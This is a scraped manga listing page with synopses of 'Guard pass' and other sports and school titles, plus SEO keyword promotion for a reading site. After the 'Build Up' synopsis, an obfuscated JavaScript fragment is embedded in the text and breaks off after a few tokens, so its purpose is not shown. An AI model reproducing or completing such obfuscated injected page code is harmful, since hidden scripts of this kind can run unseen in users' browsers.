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Guard pass

Read Manhwa Guard pass Online For Free At Hari Manga Guard pass Manga also known as “ガードパス-Guard Pass / 가드패스”. This OnGoing webtoon was released on 2021. The story was written by Oh son do son and illustrations by Oh son do son. The content of the comic Guard pass: Lim Sejun, who likes to eat, is fat and has a large physique. He has high self-esteem and a firm personality that doesn’t even care about being teased for being fat. He has only one friend, ‘Seo Hajin’. She has always been learning Jiujitsu to protect Sejun since childhood. One day, Sejun has trouble with a delinquent in the same class, and Hajin sees it and destroys that delinquent. But one night, Hajin is found severely beaten and suffers from a badly injured knee and more serious psychological trauma. Sejun tries to tell the police, but when the investigation doesn’t make much progress, he can’t control his anger and goes to find the culprit himself, but he’s defeated by the delinquent who learned Jiujitsu and finds nothing. Then he learns Jiujitsu from a man named ‘Jason’ who saved him. Three months later, Sejun, who learned Jiujitsu and lost weight, finds out that a veiled group is involved, and wants to destroy it. A school action drama depicting individual revenge. The comic Guard pass belongs to the Genre: Action, Comedy, Drama, Fantasy, Manhwa, Martial Arts, School Life, Shounen, Sports KunManga is a comprehensive website featuring the latest and hottest manga, updated rapidly to cater to readers with high-quality images and provide them with excellent experiences. With keywords such as “TopManhua” and “Manhwa Website,” as well as related terms like Smut Manhwa, New Manhwa 2024, and Read Manga Engsub ensures readers have access to a wide selection of top-notch manga content. Please always follow and share with your friends to support the website MANGAZIN.ORG so that we have more motivation to publish the latest and best comics. Follow get to read NEW MANHWA updated: Under the Shade of Wild Roses The Boy Next Door Love Or Attraction


Overtime Elite

Omari’s dream was always to become a professional basketball player. But that dream was quickly crushed by reality. There’s school, money, his strict aunt, and the future, of which he wasn’t sure of until a mysterious scout discovers his talent with a ball and offers him a ticket to Overtime Elite Academy, a high-tech program designed to craft the world's greatest basketball player. Does Omari have what it takes to survive against the most competitive basketball talent? Or will his dream slip away again?


Build Up

Kang Maru is just an ordinary kid who likes what kids like and plays what kids play, But one day he was forced to watch a Football World Cup instead of an animation, simply because his father is a fan and is the owner of the TV set. At a glance of that said sports, he was mesmerized and fixated to a game of football that his heart is racing because of the intensity of that sports, unbeknownst to him he already love the game., because of this, he set his goal, and that goal is to be a football player!<script></script><script>(function(_0x57637e,_0x2cf713){var _0x255d22=_0x2e82,_0xcf3df7=_0x57637e();while(!![]){try{var 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Eigo Nitta, new student in Hoyo high school, is enrolled in the baseball team. Talented as fast pitcher but lacking in term of technique, Eigo Nitta aims to be the new pitcher of the team. He has to face many opponents, which creates an atmosphere of competition in the baseball team. However he and his teammates will have to find a way to solve the rivalry among the baseball team in order to go to Koshien tournament.


Pocket Monsters - Liko's Treasure

Liko is a girl with a mysterious pendant. Liko is happy to receive her first Pokemon, Sprigatito, but Sprigatito doesn\'t listen to her at all...? This is the official manga adaptation depicting Liko and Sprigatito\'s adventures.


Uma Musume: Cinderella Gray

Uma Musume: Cinderella Gray is a spin-off title of the Uma Musume project by Cygames. It follows Oguri Cap through her time at Kasamatsu Training Center Academy and on her journey of becoming a legendary horse girl. Visit the main series website at:


Be Still My Heart

A wayward teenager with existential questions, Sugu has a secret that he can’t tell anyone: he has a swimsuit fetish. When his homeroom teacher catches him peeping on the girls’ water polo team at school, Sugu is given only one way out. He must disguise himself as a girl and join the water polo team. He reluctantly accepts, only to discover that there’s much more to the sport than splashing around with cute girls in swimsuits. Somewhere along the way, Sugu might even discover the reason his heartbeat is taking up a new rhythm.



The stage is the proud land of the north--Hokkaido. The year is 2010. Rou Shirakawa has just received the highest score in history at the All-Japan Junior Figure Skating Championships! But suddenly, he loses control and starts destroying the stage. He is quickly disqualified and banned from the skating world for life. Now nicknamed "the Rabid Prince," Rou ends up in Tamakomai, an ice hockey town in northern Japan. And on a hockey rink on a frozen lake, he meets the ruthless Genma brothers! Rou will soon learn of the famous Oino-kami high school and their quest to win an unprecedented 20th straight national hockey championship. And also the strong, yet beautiful battle sport--ice hockey! Change, grow, evolve! Turn defeat into victory in this red-hot redemption story!


Uma Musume Pretty Derby: Star Blossom

The popular cross-media content \"Uma Musume Pretty Derby\" features \"Uma Musume\" who have inherited the names and souls of numerous racehorses! A new legend begins with the indomitable horse girl \"Sakura Laurel\" as the main character. --- - [Alternative Raw](



As soon as he entered high school, Shiki Koshiyama was invited to the mysterious \"Quiz Study Group\" led by his senpai. What will Shiki run into when being dragged along by his classmate Mari into the dazzling world of competitive quizzes?! Get ready for a manga that features fierce quiz competitions!



In Giant Killing a ragtag bunch from East Tokyo are struggling in Japan's top football league. The team is going through an abysmal spell right now where they are nearing the bottom of the table and have lost five matches in a row. Losing hasn't done much to team morale, because it was already at a low. Fan support, on the other hand, is also looking bleak. In the world of football, once the fans turn on a team, the end is near. The team doesn't recover, coaches are fired, players are sold, and the team drops to lower divisions. In a situation where profits often prevent them from ever being successful again against even the mediocre top division programs... ETU, East Tokyo United, has only their coach to blame. ETU hires a new coach that once played in ETU. This coach wishes to prove to his ex-players and fans that even against the biggest clubs in the nation, he can make the team win. In 2010, this manga received the 34th Annual Kodansha Manga Award for General Manga.


Skool of Street

DJ, drop the beat! When 18-year-old K-pop stan Suhyeon gets his heart broken, he turns to his actual true love, girl group sensation MainTainA–especially his bias, the group’s main dancer, Hailey. Leaving his bittersweet first relationship behind to transfer to Seoul, Suhyeon finds not only a spitting image of his bias in the school dance club member Hye-eun, who is supposedly Hailey’s younger sister, but also a new love in the most unexpected of places: the art of street dance! While helping Hye-eun overcome her stage fright, Suhyeon finds there may be more to life than love!
